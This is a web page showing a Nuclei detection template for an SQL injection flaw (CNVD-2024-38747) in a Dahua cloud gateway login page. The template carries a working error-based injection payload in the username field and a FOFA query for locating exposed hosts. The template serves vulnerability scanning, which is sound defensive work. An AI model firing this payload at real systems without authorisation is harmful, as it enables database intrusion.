Zhejiang Dahua Smart Cloud Gateway Registration Platform - SQL Injection

ID: CNVD-2024-38747

Severity: high

Author: s4e-io

Tags: cnvd,cnvd2024,sqli,dahua

Description

Zhejiang Dahua Technology Co., Ltd. Smart Cloud Gateway Registration Management Platform has a SQL injection vulnerability, which can be exploited by attackers to obtain sensitive database information.

YAML Source

id: CNVD-2024-38747

info:
  name: Zhejiang Dahua Smart Cloud Gateway Registration Platform - SQL Injection
  author: s4e-io
  severity: high
  description: |
    Zhejiang Dahua Technology Co., Ltd. Smart Cloud Gateway Registration Management Platform has a SQL injection vulnerability, which can be exploited by attackers to obtain sensitive database information.
  reference:
    - https://blog.csdn.net/qq_39894062/article/details/142982815
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="智能云网关注册管理平台"
  tags: cnvd,cnvd2024,sqli,dahua

variables:
  num: "999999999"

http:
  - raw:
      - |
        POST /index.php/User/doLogin HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=1')and+updatexml(1,concat(0x7e,md5({{num}}),0x7e),1)--+&password=

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"md5({{num}})", "XPATH syntax error")'
          - 'status_code == 404'
        condition: and
# digest: 4a0a00473045022043780e541ca292028491aefcefb87319560a978b81eafa90d0ee71726c1116d1022100c5fd06532b6ba33e7e328be1c25980385bd8a509d8a8e3adad1c1260360477dd:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cnvd/2024/CNVD-2024-38747.yaml"

View on Github